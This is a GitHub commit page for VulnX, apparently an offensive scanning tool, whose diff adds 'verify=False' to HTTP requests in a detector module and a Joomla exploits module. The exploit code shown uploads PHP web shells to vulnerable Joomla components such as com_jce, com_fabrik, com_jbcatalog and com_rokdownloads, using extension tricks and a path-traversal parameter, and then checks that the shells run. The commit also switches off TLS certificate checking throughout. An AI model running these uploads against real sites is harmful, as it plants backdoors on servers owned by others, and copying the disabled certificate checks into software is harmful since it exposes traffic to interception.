Skip to content

Commit

Permalink
#77 fix set unsecure requests.
Browse files Browse the repository at this point in the history
  • Loading branch information
anouarbensaad committed Apr 19, 2020
1 parent 9707b28 commit a2e86a8
Show file tree
Hide file tree
Showing 4 changed files with 98 additions and 99 deletions.
6 changes: 3 additions & 3 deletions modules/detector.py
Original file line number Diff line number Diff line change
Expand Up @@ -44,14 +44,14 @@ def __init__(

def __getlmcontent__(self):
lm_content = self.url + '/smiley/1.gif'
return requests.get(lm_content, self.headers).text
return requests.get(lm_content, headers=self.headers,verify=False).text

def __getlm2content__(self):
lm2_content = self.url + '/rss.xml'
return requests.get(lm2_content, self.headers).text
return requests.get(lm2_content, headers=self.headers,verify=False).text

def __getcontent__(self):
return requests.get(self.url, self.headers).text
return requests.get(self.url, headers=self.headers,verify=False).text

def __getexploit__(self):
if self.exploit:
Expand Down
46 changes: 23 additions & 23 deletions modules/exploits/joomla_exploits.py
Original file line number Diff line number Diff line change
Expand Up @@ -24,7 +24,7 @@ def com_jce(self):
'Filedata' : [open('shell/VulnX.gif','rb')],
'action':'Upload',
}
requests.post(endpoint, data=data, headers=self.headers).text
requests.post(endpoint, data=data, headers=self.headers,verify=False).text
dump_data = self.url + "/VulnX.gif"
res=requests.get(dump_data, self.headers).text
matches = re.findall(re.compile(r'/image/gif/'),res)
Expand All @@ -51,9 +51,9 @@ def com_media(self):
data = {
fieldname:shell,
}
requests.post(endpoint, data=data, headers=self.headers).text
requests.post(endpoint, data=data, headers=self.headers,verify=False).text
dump_data = endpoint+"/images/XAttacker.txt"
response = requests.get(dump_data,self.headers).text
response = requests.get(dump_data,self.headers,verify=False).text
if re.findall(r'Tig', response):
return dict(
url=self.url,
Expand Down Expand Up @@ -139,7 +139,7 @@ def com_fabrika(self):
}
requests.post(endpoint, data=data, headers=self.headers).text
dump_data = endpoint+"/images/XAttacker.txt"
response = requests.get(dump_data,self.headers).text
response = requests.get(dump_data,self.headers,verify=False).text
if re.findall(r'Vuln X', response):
return dict(
url=self.url,
Expand All @@ -164,9 +164,9 @@ def com_fabrikb(self):
data = {
fieldname:shell,
}
requests.post(endpoint, data=data, headers=self.headers).text
requests.post(endpoint, data=data, headers=self.headers,verify=False).text
dump_data = endpoint+"/images/XAttacker.txt"
response = requests.get(dump_data,self.headers).text
response = requests.get(dump_data,self.headers,verify=False).text
if re.findall(r'Tig', response):
return dict(
url=self.url,
Expand Down Expand Up @@ -195,7 +195,7 @@ def com_foxcontact(self):
data = {
fieldname:shell,
}
requests.post(endpoint, data=data, headers=self.headers).text
requests.post(endpoint, data=data, headers=self.headers,verify=False).text
dump_data = endpoint+"/images/XAttacker.txt"
response = requests.get(dump_data,self.headers).text
if re.findall(r'Tig', response):
Expand All @@ -217,7 +217,7 @@ def com_adsmanager(self):
img = open('shell/VulnX.php', 'rb')
name_img= os.path.basename('shell/VulnX.html')
files= {'image': (name_img,img,'form-data',{'Expires': '0'}) }
requests.post(endpoint,files=files ,headers=self.headers)
requests.post(endpoint,files=files ,headers=self.headers,verify=False)
shellup = self.url + "/tmp/plupload/VulnX.html"
checkShell = requests.get(shellup).text
statusCheck = re.findall(re.compile(r'VulnX'),checkShell)
Expand All @@ -237,7 +237,7 @@ def com_adsmanager(self):

def com_blog(self):
endpoint = self.url + "/index.php?option=com_myblog&task=ajaxupload"
checkShell = requests.get(endpoint).text
checkShell = requests.get(endpoint,headers=self.headers,verify=False).text
statusCheck = re.findall(re.compile(r'has been uploaded'),checkShell)
if statusCheck:
return dict(
Expand All @@ -255,7 +255,7 @@ def com_blog(self):

def com_users(self):
endpoint = self.url + "/index.php?option=com_users&view=registration"
checkShell = requests.get(endpoint).text
checkShell = requests.get(endpoint,headers=self.headers,verify=False).text
statusCheck = re.findall(re.compile(r'jform_email2-lbl'),checkShell)
if statusCheck:
return dict(
Expand All @@ -281,7 +281,7 @@ def comweblinks(self):
fieldname = "image[]"
files= {'image': (name_img,img,'form-data',{'Expires': '0'})}
data = { fieldname : files }
requests.post(endpoint, data=data, headers=self.headers).text
requests.post(endpoint, data=data, headers=self.headers,verify=False).text
shellup = self.url + "/images/VulnX.gif"
checkShell = requests.get(shellup)
if checkShell.status_code == 200:
Expand All @@ -303,7 +303,7 @@ def mod_simplefileupload(self):
img = open('shell/VulnX.php.mp4', 'rb')
name_img= os.path.basename('shell/VulnX.php.mp4')
files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'})}
requests.post(endpoint, files=files, headers=self.headers)
requests.post(endpoint, files=files, headers=self.headers,verify=False)
shellup = self.url + "/modules/mod_simplefileuploadv1.3/elements/VulnX.php?Vuln=X"
checkShell = requests.get(shellup).text
statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
Expand All @@ -328,7 +328,7 @@ def com_jbcatalog(self):
fieldname = "image[]"
files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'})}
data = { fieldname : files }
requests.post(endpoint, data=data, headers=self.headers).text
requests.post(endpoint, data=data, headers=self.headers,verify=False).text
shellup = self.url + "/components/com_jbcatalog/libraries/jsupload/server/php/files/VulnX.php?Vuln=X"
checkShell = requests.get(shellup).text
statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
Expand All @@ -353,9 +353,9 @@ def com_sexycontactform(self):
fieldname = "image[]"
files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'})}
data = { fieldname : files }
requests.post(endpoint, data=data, heades=self.headers).text
requests.post(endpoint, data=data, heades=self.headers,verify=False).text
shellup = self.url + "/com_sexycontactform/fileupload/files/files/VulnX.php?Vuln=X"
checkShell = requests.get(shellup).text
checkShell = requests.get(shellup,headers=self.headers,verify=False).text
statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
if statusCheck:
return dict(
Expand All @@ -380,9 +380,9 @@ def com_rokdownloads(self):
data = { fieldname : files,
'jpath' : '..%2F..%2F..%2F..%2F',
}
requests.post(endpoint, data=data, headers=self.headers).text
requests.post(endpoint, data=data, headers=self.headers,verify=False).text
shellup = self.url + "/images/stories/VulnX.php?Vuln=X"
checkShell = requests.get(shellup).text
checkShell = requests.get(shellup,headers=self.headers,verify=False).text
statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
if statusCheck:
return dict(
Expand All @@ -405,9 +405,9 @@ def com_extplorer(self):
fieldname = "Filedata"
files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'})}
data = { fieldname : files }
requests.post(endpoint, data, headers=self.headers).text
requests.post(endpoint, data, headers=self.headers,verify=False).text
shellup = self.url + "/images/stories/VulnX.php?Vuln=X"
checkShell = requests.get(shellup).text
checkShell = requests.get(shellup,headers=self.headers,verify=False).text
statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
if statusCheck:
return dict(
Expand All @@ -432,9 +432,9 @@ def com_jwallpapers(self):
data = { fieldname : files ,
'submit' : 'Upload',
}
requests.post(endpoint, data, headers=self.headers).text
requests.post(endpoint, data, headers=self.headers,verify=False).text
shellup = self.url + "/jwallpapers_files/plupload/VulnX.php?Vuln=X"
checkShell = requests.get(shellup).text
checkShell = requests.get(shellup,headers=self.headers,verify=False).text
statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
if statusCheck:
return dict(
Expand All @@ -459,9 +459,9 @@ def com_facileforms(self):
data = { fieldname : files ,
'folder' : '/components/com_facileforms/libraries/jquery/',
}
requests.post(endpoint, data, headers=self.headers).text
requests.post(endpoint, data, headers=self.headers,verify=False).text
shellup = self.url + "/components/com_facileforms/libraries/jquery/VulnX.php?Vuln=X"
checkShell = requests.get(shellup).text
checkShell = requests.get(shellup,headers=self.headers,verify=False).text
statusCheck = re.findall(re.compile(r'Vuln X'),checkShell)
if statusCheck:
return dict(
Expand Down
Loading

0 comments on commit a2e86a8

Please sign in to comment.